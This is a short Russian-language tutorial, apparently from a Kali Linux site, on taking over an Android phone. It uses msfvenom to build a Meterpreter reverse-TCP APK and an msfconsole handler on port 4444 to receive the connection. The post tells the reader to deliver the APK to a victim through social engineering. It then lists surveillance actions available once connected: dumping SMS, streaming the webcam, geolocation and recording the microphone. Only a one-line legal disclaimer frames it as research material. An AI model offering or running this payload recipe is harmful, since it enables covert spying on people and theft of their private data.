Kali Linux обратная сессия andoid |

Kali Linux обратная сессия andoid

Мануал

Одним из интересных трюков является обратная сессия tcp android.

Все, что вам нужно, это создать небольшой пэйлоад с помощью msfvenom.

 

 # msfvenom -p android / meterpreter / reverse_tcp LHOST = {ВАШ IP-АДРЕС} LPORT = 4444 R> /root/FILENAME.apk

{ВАШ IP ADDRESS} может быть вашим локальным IP-адресом или публичным IP-адресом.

Если вы хотите использовать общедоступный IP-адрес и взломать WAN, вам необходимо настроить перенаправление портов на маршрутизаторе, который может быть заблокирован вашим интернет-провайдером.

Он будет генерировать приложения для Android.

Вам необходимо доставить это приложение с помощью Социальной инженерии на устройство жертвы.

Перед доставкой начните прослушивать порт 4444:

  # msfconsole
use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set LHOST 192.168.1.123 //local ip
set LPORT 4444
exploit 

Когда жертва устанавливает этот .apk, ваш сеанс будет запущен в терминале:

Это много интересного, что вы можете сделать с помощью meterpreter, например dump_sms, webcam_stream, geolocate, record mic.

Введите помощь в терминале, и вы увидите что вы можете сделать с этим инструментом.

Примечание: Информация для исследования, обучения или проведения аудита. Применение в корыстных целях карается законодательством РФ.

 

 

Пожалуйста, не спамьте и никого не оскорбляйте. Это поле для комментариев, а не спамбокс. Рекламные ссылки не индексируются!
Добавить комментарий